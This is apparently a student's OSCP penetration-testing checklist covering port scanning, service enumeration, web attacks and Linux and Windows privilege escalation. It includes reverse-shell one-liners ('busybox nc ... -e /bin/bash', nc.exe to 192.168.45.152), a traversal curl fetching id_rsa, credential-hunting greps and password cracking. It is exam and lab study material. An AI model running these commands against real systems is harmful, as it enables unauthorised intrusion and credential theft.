Standalones Checklist

- [x] Scan all TCP Ports. - `nmap $IP -Pn -n --open --min-rate 3000 -p-` - `nmap $IP -sC -sV -p $PORTS` - [x] Check UDP Ports - `nmap $IP -sU --top-ports 10` - [x] if `FTP`? - `ftp $IP` & Try `anonymous` login - Always download ftp shares to your machine `wget -m ftp://$IP/$share` - [ ] if `SSH`? - if `private-key` is passphrase-protected: `ssh2john id_rsa > hash.txt` - if you find an `id_rsa` key in a web app, use `curl` or `burp` to save it - `curl --path-as-is http://$IP/../../../home/$USER/id_rsa -o id_rsa` - `chmod 400 id_rsa` - if you find an `id_rsa` key and it doesn't work for one user, try it with other users listed in `/etc/passwd` - [x] if `STMP`? - [[SMTP 25]] - [x] if `IMAP` or `POP3`? - [[IMAP 143 993]] - [[POP3 110 995]] - Bruteforce with [[Hydra]] using the username found from `SMTP` - [x] if `DNS`? - [[dig]] - [[dnsenum]] - [x] If `SMB`? - [[SMB 139 445]] - `smbclient -N -L //$IP` - `smbmap -H $IP` - Mount a share - `sudo mount -t cifs -o 'user=Wook' //$IP/$Share /mnt/wook` - `sudo mount -t cifs -o 'user=Wook,port=1445' //$IP/$Share /mnt/wook` - `sudo umount /mnt/wook` - [x] if `RPC`? - [[RPC 135]] - [[rpcclient]] - [x] if `LDAP`? - [x] if `SNMP` from UDP scan? - [[onesixtyone]] - [[snmp-check]] - [[snmpwalk]] - [[braa]] - [ ] if `HTTP`? - Use `Burpsuite` and [[curl]] - `View Page Source` - `robots.txt`, `sitemap.xml` - File/Directory busting - [[sec/OSCP Notes/02 Vulnerability Analysis/tools & concepts/gobuster|gobuster]] - [[sec/OSCP Notes/03 Exploitation/Web Attacks/tools & concepts/File Upload|File Upload]] - Inject the payload (e.g., `User-Agent` or `Referrer`) - [[Local File Inclusion]] - [[Remote File Inclusion]] - Always use the ports from the Nmap output first for a `reverse shell` - Then try 80 or 443 - [[Directory Traversal]] - [[SQL Injection]] - [ ] if `NFS`? - [[NFS 111 2049]] - [ ] if `MySQL`? - [[MySQL 3306]] - [ ] if `MSSQL`? - [ ] [[MSSQL1433]] - [ ] if `PostgreSQL` - [[Postgres 5432 5433 5437]] - [[psql]] - [ ] if `RDP`? - if you know admin creds, open softwares with admin privileges. - [ ] For unknown ports, interact them with - `telnet $IP $PORT` - `nc -nv $IP $PORT` - [ ] Enumerate web servers with all the relevant wordlists - [ ] Do proper finger printing - `Nmap -sC -sV` - `Nmap vuln scan` - `Wappalyzer` - `Check CMS` - `Check server headers` - `nc -nvv` - [ ] Check for public exploits on `exploitDB`, `searchsploit`, `Google`, `Github` - `CVE-XXXX-XXXX site:github.com` - Find the attack vector in the code of exploit - [ ] `nc`등 으로 reverse shell 연결이 안돼면 `busybox`로 시도 - `busybox nc $IP $PORT -e /bin/bash` - [ ] Stabilize TTY - [[Fully interactive TTY & Shells]] - Try `Penelope`? ### Linux Privilege Escalation - [ ] Run `linpeas` & possible `LSE (Linux Smart Enumeration)` - [ ] Manually check for Linux privesc vectors [[sec/OSCP Notes/04 Linux Privilege Escalation/overview|overview]] - [ ] Quick Enum ```bash sudo -l sudo -V # Kernel Exploits uname -sr uname -a lsb_release -a # check for creds find / -type f -exec grep -i -I "pass\|cred\|key\|secret" {} /dev/null \; grep -rni --color=always 'password\|secret\|key\|token' . 2>/dev/null grep -rni 'password' . 2>/dev/null grep -rni 'PRIVATE KEY' . 2>/dev/null grep -Horn passsword /var/www # SUID or SGID find / -type f -perm -4000 -ls 2>/dev/null # find Non-empty directories find . -type d ! -empty # pspy tip: prevent shell from timeout 20 ./pspy64 # show ALL listening and established connections # -p requires root netstat/ss -tunpa # show ONLY listening sockets netstat/ss -tulnp netstat/ss -tuln # Capabilities getcap -r / 2>/dev/null ``` ### Windows Privilege Escalation - [ ] Run `whoami /all` - [ ] Check `C:\` for any unusual files/folders - [ ] Run [[PrivescCheck.ps1]] - [ ] Run [[sec/OSCP Notes/05 Windows Privilege Escalation/tools & concepts/PowerUp.ps1|PowerUp.ps1]] - [ ] Run [[winPEAS]] - [ ] Manually check for Windows privesc vectors [[sec/OSCP Notes/05 Windows Privilege Escalation/overview|overview]] - Check PowerShell History [[Hardcoded Sensitive Information]] - Check `Recycle Bin` - `whoami /user` - `dir C:\$Recycle.Bin\<S-1-5...>` - Find `dir /s /b proof.txt` ```powershell Get-History # PowerShell history of a user type “C:\Users\$USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt” # Interesting files/folders Get-ChildItem -Path C:\Users -Include *.txt,*.ini,*.pdf,*.kdbx,*.exe -Recurse -ErrorAction SilentlyContinue # When using GodPotato, create a new admin user with RunasCs RunasCs.exe svc_mssql trustno1 "nc.exe 192.168.45.152 4444 -e cmd.exe RunasCs.exe administrator passwd cmd.exe -r $IP:80 ```